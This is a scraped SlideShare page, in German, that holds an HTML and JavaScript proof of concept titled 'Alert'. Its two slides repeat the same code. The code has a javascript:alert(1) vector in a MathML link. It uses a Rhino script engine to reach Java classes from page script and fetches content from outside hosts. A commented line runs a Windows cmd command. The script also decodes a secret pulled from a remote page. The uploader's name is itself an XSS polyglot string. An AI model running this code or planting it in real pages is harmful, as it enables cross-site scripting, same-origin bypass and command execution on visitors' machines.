Alert
•Als TXT, PDF herunterladen•
1 gefällt mir•864 views
![<html><head></head><body>
<math><maction href="javascript:alert(1)">test
<!--
<script>
var element = document.createElement('iframe');
element.src = 'alert.js';
Object.getOwnPropertyNames(element).forEach(function(name) {
if (/^on/.test(name)) {
element[name] = function() {
console.log(name);
}
// console.log(name);
}
});
document.body.appendChild(element);
var y = new Packages.com.sun.script.javascript.RhinoScriptEngine()
var b = y.createBindings();
var show = function(parent, context) {
var script = "";
script += "importPackage(javax.swing);n";
script += "importPackage(java.awt);n";
script += "importClass(java.awt.Frame);n";
//script += "importClass(javax.script);n";
//script += "importClass(java.net);n";
//script += 'var frame = new java.awt.Frame("hello"); frame.setVisible(true);
println(frame.title);';
script += 'var original = ' + parent + '; println(original + " " + (typeof
original)); for (var name in original) { var message = ""; try { message =
original[name]; } catch(e) { message = e.message; }; println(name + " = " +
message); println(" ") }; println("----------------------------------")';
y.eval(script);
}
//var x = y.eval('com.sun.script.javascript.RhinoTopLevel.getTopLevelScope');
/*y.eval("importPackage(javax.swing);" +
"var optionPane = " +
"JOptionPane.showMessageDialog(null, 'test');"
)*/
//show('runCommand("cmd", "/C", "date /T")')
//show('eval(this)')
//y.eval('context.setAttribute("location", "javascript:alert(1)"');
//javax.script.ScriptContext.GLOBAL_SCOPE
show("java.net.URL('http://shafigullin.pro/test.html').getContent()");
var y = new Packages.com.sun.script.javascript.RhinoScriptEngine();](https://image.slidesharecdn.com/enth6jpwsoyxvlibi4yu-signature-94d9fae9023d8fb1cf9cfa3abee3a4e7860528cae15cd7cd5d19d9da77e6b76d-poli-150224025402-conversion-gate02/85/Alert-1-320.jpg)
![var b = y.createBindings();
var dirMethod = 'function dir(element) { println(element); if (element) { for
(var name in element) { try { println(name + " = " + element[name] + "n"); }
catch (e) { println(name + " = " + e.message); } } }; println("--------"); }; ';
//y.eval(dirMethod + 'var applet = new Packages.java.applet.Applet();
applet.start();
dir(Packages.java.net.URL("http://kotowicz.net/java/java.html").getContent())')
y.eval(dirMethod + "dir(this)")
var inputStream = new java.io.BufferedReader(new java.io.InputStreamReader(new
java.net.URL("https://kotowicz.net/java/java.html").openStream()));
var inputLine = ""; var inputStringBuilder = new java.lang.StringBuilder();
while ((inputLine = inputStream.readLine()) != null)
{inputStringBuilder.append(inputLine);}
var match = /document.secret=atob
('(.*)');/i.exec(inputStringBuilder.toString());
javax.swing.JOptionPane.showMessageDialog(null, new
java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary(match[1])))
</script>
-->
</body></html>](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Empfohlen
Weitere ähnliche Inhalte
Was ist angesagt?
Was ist angesagt? (20)
Andere mochten auch
Andere mochten auch (17)
Ähnlich wie Alert
Ähnlich wie Alert (20)
Mehr von 3$'"/s/-->*/\xss$`'<x/$"%22%27$!{1}'/./\
Mehr von 3$'"/s/-->*/\xss$`'<x/$"%22%27$!{1}'/./\ (6)
Alert
- 1. <html><head></head><body> <math><maction href="javascript:alert(1)">test <!-- <script> var element = document.createElement('iframe'); element.src = 'alert.js'; Object.getOwnPropertyNames(element).forEach(function(name) { if (/^on/.test(name)) { element[name] = function() { console.log(name); } // console.log(name); } }); document.body.appendChild(element); var y = new Packages.com.sun.script.javascript.RhinoScriptEngine() var b = y.createBindings(); var show = function(parent, context) { var script = ""; script += "importPackage(javax.swing);n"; script += "importPackage(java.awt);n"; script += "importClass(java.awt.Frame);n"; //script += "importClass(javax.script);n"; //script += "importClass(java.net);n"; //script += 'var frame = new java.awt.Frame("hello"); frame.setVisible(true); println(frame.title);'; script += 'var original = ' + parent + '; println(original + " " + (typeof original)); for (var name in original) { var message = ""; try { message = original[name]; } catch(e) { message = e.message; }; println(name + " = " + message); println(" ") }; println("----------------------------------")'; y.eval(script); } //var x = y.eval('com.sun.script.javascript.RhinoTopLevel.getTopLevelScope'); /*y.eval("importPackage(javax.swing);" + "var optionPane = " + "JOptionPane.showMessageDialog(null, 'test');" )*/ //show('runCommand("cmd", "/C", "date /T")') //show('eval(this)') //y.eval('context.setAttribute("location", "javascript:alert(1)"'); //javax.script.ScriptContext.GLOBAL_SCOPE show("java.net.URL('http://shafigullin.pro/test.html').getContent()"); var y = new Packages.com.sun.script.javascript.RhinoScriptEngine();
- 2. var b = y.createBindings(); var dirMethod = 'function dir(element) { println(element); if (element) { for (var name in element) { try { println(name + " = " + element[name] + "n"); } catch (e) { println(name + " = " + e.message); } } }; println("--------"); }; '; //y.eval(dirMethod + 'var applet = new Packages.java.applet.Applet(); applet.start(); dir(Packages.java.net.URL("http://kotowicz.net/java/java.html").getContent())') y.eval(dirMethod + "dir(this)") var inputStream = new java.io.BufferedReader(new java.io.InputStreamReader(new java.net.URL("https://kotowicz.net/java/java.html").openStream())); var inputLine = ""; var inputStringBuilder = new java.lang.StringBuilder(); while ((inputLine = inputStream.readLine()) != null) {inputStringBuilder.append(inputLine);} var match = /document.secret=atob ('(.*)');/i.exec(inputStringBuilder.toString()); javax.swing.JOptionPane.showMessageDialog(null, new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary(match[1]))) </script> --> </body></html>